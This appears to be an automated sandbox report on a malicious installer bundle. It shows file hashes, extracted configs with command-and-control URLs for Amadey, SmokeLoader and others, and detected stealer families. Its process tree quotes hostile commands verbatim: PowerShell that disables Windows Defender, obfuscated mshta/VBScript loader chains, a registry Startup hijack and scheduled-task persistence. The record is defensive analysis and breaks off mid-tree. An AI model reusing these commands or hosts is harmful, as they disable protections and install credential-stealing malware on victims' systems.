Analysis
-
max time kernel
66s -
max time network
5336s -
platform
windows7_x64 -
resource
win7-de-20211014 -
submitted
14-11-2021 09:04
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20211104
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211104
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20211014
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-en-20211104
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-de-20211104
General
-
Target
setup_x86_x64_install.exe
-
Size
8.4MB
-
MD5
dc3279eab20f1e9cff2a573c1f9ef8ee
-
SHA1
049e214cd7dc62c2d409c8cc060dcd9bcc6dcfc2
-
SHA256
edceb274c572ba560f1f27c5d97991b9b56a2bce8daf617f2b4c9bbbe5008db4
-
SHA512
eaa28ef57863778175b0efc8075b7ad2909ef4d90efdc144db318d414e64ed5e0334c8fef656bd3286e05102676b780f7b754e23cf75f15797faa62fcf69fb3a
Malware Config
Extracted
amadey
2.82
185.215.113.45/g4MbvE/index.php
Extracted
socelars
http://www.hhgenice.top/
Extracted
vidar
48.3
933
-
profile_id
933
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://membro.at/upload/
http://jeevanpunetha.com/upload/
http://misipu.cn/upload/
http://zavodooo.ru/upload/
http://targiko.ru/upload/
http://vues3d.com/upload/
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2396 2996 rundll32.exe 83 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral3/memory/2172-302-0x0000000000418F0E-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 1 IoCs
resource yara_rule behavioral3/files/0x00050000000132de-169.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral3/memory/2964-347-0x00000000009C0000-0x0000000000A95000-memory.dmp family_vidar behavioral3/memory/2964-351-0x0000000000400000-0x00000000004D8000-memory.dmp family_vidar -
resource yara_rule behavioral3/files/0x000500000001306e-71.dat aspack_v212_v242 behavioral3/files/0x000500000001306e-72.dat aspack_v212_v242 behavioral3/files/0x000600000001268b-73.dat aspack_v212_v242 behavioral3/files/0x000600000001268b-74.dat aspack_v212_v242 behavioral3/files/0x00050000000130e2-77.dat aspack_v212_v242 behavioral3/files/0x00050000000130e2-78.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 16 IoCs
pid Process 924 setup_installer.exe 1568 setup_install.exe 1156 Sun07f05cf99e017109.exe 1668 Sun07923b89b57.exe 1388 Sun0746b3c4631.exe 1108 Sun07bb82f51727fc79.exe 1756 Sun07610e6b216b74271.exe 828 Sun0768bf0e01cf08ac5.exe 1736 Sun073980a935.exe 360 Sun078a90701e.exe 1768 inst1.exe 1796 Sun07d7bdaf7c.exe 976 Sun07d46efb4bd1.exe 1236 Sun07a9799f68e7.exe 1628 tkools.exe 2372 soul3ss_crypted.exe -
Loads dropped DLL 57 IoCs
pid Process 968 setup_x86_x64_install.exe 924 setup_installer.exe 924 setup_installer.exe 924 setup_installer.exe 924 setup_installer.exe 924 setup_installer.exe 924 setup_installer.exe 1568 setup_install.exe 1568 setup_install.exe 1568 setup_install.exe 1568 setup_install.exe 1568 setup_install.exe 1568 setup_install.exe 1568 setup_install.exe 1568 setup_install.exe 820 cmd.exe 1156 Sun07f05cf99e017109.exe 1156 Sun07f05cf99e017109.exe 1800 cmd.exe 1548 cmd.exe 1388 Sun0746b3c4631.exe 1388 Sun0746b3c4631.exe 1668 Sun07923b89b57.exe 1668 Sun07923b89b57.exe 1640 schtasks.exe 1784 cmd.exe 1140 cmd.exe 1140 cmd.exe 2036 cmd.exe 1756 Sun07610e6b216b74271.exe 1756 Sun07610e6b216b74271.exe 812 cmd.exe 828 Sun0768bf0e01cf08ac5.exe 828 Sun0768bf0e01cf08ac5.exe 1736 Sun073980a935.exe 1736 Sun073980a935.exe 2024 cmd.exe 2024 cmd.exe 1288 cmd.exe 1288 cmd.exe 1108 Sun07bb82f51727fc79.exe 1108 Sun07bb82f51727fc79.exe 744 cmd.exe 1768 inst1.exe 1768 inst1.exe 1768 inst1.exe 976 Sun07d46efb4bd1.exe 976 Sun07d46efb4bd1.exe 1108 Sun07bb82f51727fc79.exe 1628 tkools.exe 1628 tkools.exe 1628 tkools.exe 1628 tkools.exe 1628 tkools.exe 1628 tkools.exe 2372 soul3ss_crypted.exe 2372 soul3ss_crypted.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 47 ipinfo.io 48 ipinfo.io 53 ipinfo.io 199 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1768 set thread context of 1236 1768 inst1.exe 59 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 668 1156 WerFault.exe 38 1400 2964 WerFault.exe 107 2568 1628 WerFault.exe 62 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1640 schtasks.exe -
Kills process with taskkill 5 IoCs
pid Process 2104 taskkill.exe 1072 taskkill.exe 1976 taskkill.exe 1808 taskkill.exe 2392 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Sun07d46efb4bd1.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Sun07d46efb4bd1.exe -
Suspicious use of AdjustPrivilegeToken 36 IoCs
description pid Process Token: SeCreateTokenPrivilege 976 Sun07d46efb4bd1.exe Token: SeAssignPrimaryTokenPrivilege 976 Sun07d46efb4bd1.exe Token: SeLockMemoryPrivilege 976 Sun07d46efb4bd1.exe Token: SeIncreaseQuotaPrivilege 976 Sun07d46efb4bd1.exe Token: SeMachineAccountPrivilege 976 Sun07d46efb4bd1.exe Token: SeTcbPrivilege 976 Sun07d46efb4bd1.exe Token: SeSecurityPrivilege 976 Sun07d46efb4bd1.exe Token: SeTakeOwnershipPrivilege 976 Sun07d46efb4bd1.exe Token: SeLoadDriverPrivilege 976 Sun07d46efb4bd1.exe Token: SeSystemProfilePrivilege 976 Sun07d46efb4bd1.exe Token: SeSystemtimePrivilege 976 Sun07d46efb4bd1.exe Token: SeProfSingleProcessPrivilege 976 Sun07d46efb4bd1.exe Token: SeIncBasePriorityPrivilege 976 Sun07d46efb4bd1.exe Token: SeCreatePagefilePrivilege 976 Sun07d46efb4bd1.exe Token: SeCreatePermanentPrivilege 976 Sun07d46efb4bd1.exe Token: SeBackupPrivilege 976 Sun07d46efb4bd1.exe Token: SeRestorePrivilege 976 Sun07d46efb4bd1.exe Token: SeShutdownPrivilege 976 Sun07d46efb4bd1.exe Token: SeDebugPrivilege 976 Sun07d46efb4bd1.exe Token: SeAuditPrivilege 976 Sun07d46efb4bd1.exe Token: SeSystemEnvironmentPrivilege 976 Sun07d46efb4bd1.exe Token: SeChangeNotifyPrivilege 976 Sun07d46efb4bd1.exe Token: SeRemoteShutdownPrivilege 976 Sun07d46efb4bd1.exe Token: SeUndockPrivilege 976 Sun07d46efb4bd1.exe Token: SeSyncAgentPrivilege 976 Sun07d46efb4bd1.exe Token: SeEnableDelegationPrivilege 976 Sun07d46efb4bd1.exe Token: SeManageVolumePrivilege 976 Sun07d46efb4bd1.exe Token: SeImpersonatePrivilege 976 Sun07d46efb4bd1.exe Token: SeCreateGlobalPrivilege 976 Sun07d46efb4bd1.exe Token: 31 976 Sun07d46efb4bd1.exe Token: 32 976 Sun07d46efb4bd1.exe Token: 33 976 Sun07d46efb4bd1.exe Token: 34 976 Sun07d46efb4bd1.exe Token: 35 976 Sun07d46efb4bd1.exe Token: SeDebugPrivilege 1668 Sun07923b89b57.exe Token: SeDebugPrivilege 2392 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 968 wrote to memory of 924 968 setup_x86_x64_install.exe 28 PID 968 wrote to memory of 924 968 setup_x86_x64_install.exe 28 PID 968 wrote to memory of 924 968 setup_x86_x64_install.exe 28 PID 968 wrote to memory of 924 968 setup_x86_x64_install.exe 28 PID 968 wrote to memory of 924 968 setup_x86_x64_install.exe 28 PID 968 wrote to memory of 924 968 setup_x86_x64_install.exe 28 PID 968 wrote to memory of 924 968 setup_x86_x64_install.exe 28 PID 924 wrote to memory of 1568 924 setup_installer.exe 29 PID 924 wrote to memory of 1568 924 setup_installer.exe 29 PID 924 wrote to memory of 1568 924 setup_installer.exe 29 PID 924 wrote to memory of 1568 924 setup_installer.exe 29 PID 924 wrote to memory of 1568 924 setup_installer.exe 29 PID 924 wrote to memory of 1568 924 setup_installer.exe 29 PID 924 wrote to memory of 1568 924 setup_installer.exe 29 PID 1568 wrote to memory of 1672 1568 setup_install.exe 31 PID 1568 wrote to memory of 1672 1568 setup_install.exe 31 PID 1568 wrote to memory of 1672 1568 setup_install.exe 31 PID 1568 wrote to memory of 1672 1568 setup_install.exe 31 PID 1568 wrote to memory of 1672 1568 setup_install.exe 31 PID 1568 wrote to memory of 1672 1568 setup_install.exe 31 PID 1568 wrote to memory of 1672 1568 setup_install.exe 31 PID 1568 wrote to memory of 1856 1568 setup_install.exe 32 PID 1568 wrote to memory of 1856 1568 setup_install.exe 32 PID 1568 wrote to memory of 1856 1568 setup_install.exe 32 PID 1568 wrote to memory of 1856 1568 setup_install.exe 32 PID 1568 wrote to memory of 1856 1568 setup_install.exe 32 PID 1568 wrote to memory of 1856 1568 setup_install.exe 32 PID 1568 wrote to memory of 1856 1568 setup_install.exe 32 PID 1568 wrote to memory of 820 1568 setup_install.exe 33 PID 1568 wrote to memory of 820 1568 setup_install.exe 33 PID 1568 wrote to memory of 820 1568 setup_install.exe 33 PID 1568 wrote to memory of 820 1568 setup_install.exe 33 PID 1568 wrote to memory of 820 1568 setup_install.exe 33 PID 1568 wrote to memory of 820 1568 setup_install.exe 33 PID 1568 wrote to memory of 820 1568 setup_install.exe 33 PID 1568 wrote to memory of 1800 1568 setup_install.exe 34 PID 1568 wrote to memory of 1800 1568 setup_install.exe 34 PID 1568 wrote to memory of 1800 1568 setup_install.exe 34 PID 1568 wrote to memory of 1800 1568 setup_install.exe 34 PID 1568 wrote to memory of 1800 1568 setup_install.exe 34 PID 1568 wrote to memory of 1800 1568 setup_install.exe 34 PID 1568 wrote to memory of 1800 1568 setup_install.exe 34 PID 1568 wrote to memory of 1784 1568 setup_install.exe 35 PID 1568 wrote to memory of 1784 1568 setup_install.exe 35 PID 1568 wrote to memory of 1784 1568 setup_install.exe 35 PID 1568 wrote to memory of 1784 1568 setup_install.exe 35 PID 1568 wrote to memory of 1784 1568 setup_install.exe 35 PID 1568 wrote to memory of 1784 1568 setup_install.exe 35 PID 1568 wrote to memory of 1784 1568 setup_install.exe 35 PID 1568 wrote to memory of 1640 1568 setup_install.exe 65 PID 1568 wrote to memory of 1640 1568 setup_install.exe 65 PID 1568 wrote to memory of 1640 1568 setup_install.exe 65 PID 1568 wrote to memory of 1640 1568 setup_install.exe 65 PID 1568 wrote to memory of 1640 1568 setup_install.exe 65 PID 1568 wrote to memory of 1640 1568 setup_install.exe 65 PID 1568 wrote to memory of 1640 1568 setup_install.exe 65 PID 1568 wrote to memory of 1548 1568 setup_install.exe 37 PID 1568 wrote to memory of 1548 1568 setup_install.exe 37 PID 1568 wrote to memory of 1548 1568 setup_install.exe 37 PID 1568 wrote to memory of 1548 1568 setup_install.exe 37 PID 1568 wrote to memory of 1548 1568 setup_install.exe 37 PID 1568 wrote to memory of 1548 1568 setup_install.exe 37 PID 1568 wrote to memory of 1548 1568 setup_install.exe 37 PID 820 wrote to memory of 1156 820 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC930E916\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵PID:1672
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1856
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07f05cf99e017109.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07f05cf99e017109.exeSun07f05cf99e017109.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1156 -
C:\Users\Admin\Pictures\Adobe Films\Cs6SVEBFG0pnpAtS0Svqd3zH.exe"C:\Users\Admin\Pictures\Adobe Films\Cs6SVEBFG0pnpAtS0Svqd3zH.exe"6⤵PID:3056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 14726⤵
- Program crash
PID:668
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07923b89b57.exe4⤵
- Loads dropped DLL
PID:1800 -
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07923b89b57.exeSun07923b89b57.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1668 -
C:\Users\Admin\AppData\Roaming\8941195.exe"C:\Users\Admin\AppData\Roaming\8941195.exe"6⤵PID:2560
-
-
C:\Users\Admin\AppData\Roaming\6097009.exe"C:\Users\Admin\AppData\Roaming\6097009.exe"6⤵PID:2588
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:2792
-
-
-
C:\Users\Admin\AppData\Roaming\7711949.exe"C:\Users\Admin\AppData\Roaming\7711949.exe"6⤵PID:2696
-
-
C:\Users\Admin\AppData\Roaming\6092579.exe"C:\Users\Admin\AppData\Roaming\6092579.exe"6⤵PID:2728
-
-
C:\Users\Admin\AppData\Roaming\2345679.exe"C:\Users\Admin\AppData\Roaming\2345679.exe"6⤵PID:2764
-
-
C:\Users\Admin\AppData\Roaming\1637676.exe"C:\Users\Admin\AppData\Roaming\1637676.exe"6⤵PID:2932
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Roaming\1637676.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if """"== """" for %v In (""C:\Users\Admin\AppData\Roaming\1637676.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )7⤵PID:3008
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Roaming\1637676.exe" > Qw5u.exe &&stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""== "" for %v In ("C:\Users\Admin\AppData\Roaming\1637676.exe" ) do taskkill -F -IM "%~Nxv"8⤵PID:1420
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -IM "1637676.exe"9⤵
- Kills process with taskkill
PID:1072
-
-
C:\Users\Admin\AppData\Local\Temp\Qw5u.exeQw5U.Exe -PmowtdFUhhnCoUk9⤵PID:2596
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""-PmowtdFUhhnCoUk ""== """" for %v In (""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )10⤵PID:2880
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\8224331.exe"C:\Users\Admin\AppData\Roaming\8224331.exe"6⤵PID:2956
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0768bf0e01cf08ac5.exe4⤵
- Loads dropped DLL
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0768bf0e01cf08ac5.exeSun0768bf0e01cf08ac5.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:828 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScript: Close ( CreAtEoBJeCT( "WScrIpt.SHelL" ).RUn ("cmd /q/c Type ""C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0768bf0e01cf08ac5.exe"" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If """" == """" for %t in (""C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0768bf0e01cf08ac5.exe"") do taskkill -im ""%~NXt"" -f ", 0, tRuE ) )6⤵PID:336
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q/c Type "C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0768bf0e01cf08ac5.exe" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi &If "" == "" for %t in ("C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0768bf0e01cf08ac5.exe") do taskkill -im "%~NXt" -f7⤵PID:3036
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "Sun0768bf0e01cf08ac5.exe" -f8⤵
- Kills process with taskkill
PID:2104
-
-
C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe..\8S~LNTCBHnM.EXe -PhymCZvLUAWi8⤵PID:1776
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScript: Close ( CreAtEoBJeCT( "WScrIpt.SHelL" ).RUn ("cmd /q/c Type ""C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe"" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If ""-PhymCZvLUAWi "" == """" for %t in (""C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe"") do taskkill -im ""%~NXt"" -f ", 0, tRuE ) )9⤵PID:2068
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q/c Type "C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi &If "-PhymCZvLUAWi " == "" for %t in ("C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe") do taskkill -im "%~NXt" -f10⤵PID:2680
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRipt:cloSe ( CREaTeObJecT( "WscrIPT.sHELL" ).RUN("Cmd /c eCho OoC:\Users\Admin\AppData\Roaming> R2KSNNo3.CF & ecHo | sET /P = ""MZ"" > cxQOi7.xVE&cOPy /y /b CxQOI7.xVE + W4C1VWe.8 + CJkGE7GA.1lH + a5XHIxJL.To + eXTOkHQB.3J + nXVlD.YJ + _oFmVg1.L + R2KSNNO3.CF ..\TSIz8.~& Start control ..\TSiZ8.~ & DeL /Q * " ,0 ,true) )9⤵PID:2296
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCho OoC:\Users\Admin\AppData\Roaming> R2KSNNo3.CF &ecHo | sET /P = "MZ" >cxQOi7.xVE&cOPy /y /b CxQOI7.xVE+ W4C1VWe.8 + CJkGE7GA.1lH + a5XHIxJL.To+ eXTOkHQB.3J + nXVlD.YJ + _oFmVg1.L + R2KSNNO3.CF ..\TSIz8.~& Start control ..\TSiZ8.~ & DeL /Q *10⤵PID:1664
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07bb82f51727fc79.exe4⤵PID:1640
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07bb82f51727fc79.exeSun07bb82f51727fc79.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1108 -
C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1628 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\7⤵PID:1776
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\8⤵PID:1624
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F7⤵
- Loads dropped DLL
- Creates scheduled task(s)
PID:1640
-
-
C:\Users\Admin\AppData\Local\Temp\soul3ss_crypted\soul3ss_crypted.exe"C:\Users\Admin\AppData\Local\Temp\soul3ss_crypted.\soul3ss_crypted.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2372
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 9807⤵
- Program crash
PID:2568
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0746b3c4631.exe4⤵
- Loads dropped DLL
PID:1548 -
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0746b3c4631.exeSun0746b3c4631.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07610e6b216b74271.exe4⤵
- Loads dropped DLL
PID:1140 -
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07610e6b216b74271.exeSun07610e6b216b74271.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1756 -
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07610e6b216b74271.exeC:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07610e6b216b74271.exe6⤵PID:1616
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07610e6b216b74271.exeC:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07610e6b216b74271.exe6⤵PID:2172
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07e5c589dd5d.exe4⤵PID:944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun075d5a7849d7670a.exe4⤵PID:1932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun07e840e6fb5.exe4⤵PID:964
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07e840e6fb5.exeSun07e840e6fb5.exe5⤵PID:2652
-
C:\Users\Admin\AppData\Local\Temp\is-04G54.tmp\Sun07e840e6fb5.tmp"C:\Users\Admin\AppData\Local\Temp\is-04G54.tmp\Sun07e840e6fb5.tmp" /SL5="$2023A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07e840e6fb5.exe"6⤵PID:1492
-
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07e840e6fb5.exe"C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07e840e6fb5.exe" /SILENT7⤵PID:2556
-
C:\Users\Admin\AppData\Local\Temp\is-ODOC7.tmp\Sun07e840e6fb5.tmp"C:\Users\Admin\AppData\Local\Temp\is-ODOC7.tmp\Sun07e840e6fb5.tmp" /SL5="$50238,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07e840e6fb5.exe" /SILENT8⤵PID:1056
-
C:\Users\Admin\AppData\Local\Temp\is-2OAV4.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-2OAV4.tmp\postback.exe" ss19⤵PID:2660
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun073980a935.exe4⤵
- Loads dropped DLL
PID:2036 -
C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun073980a935.exeSun073980a935.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1736 -
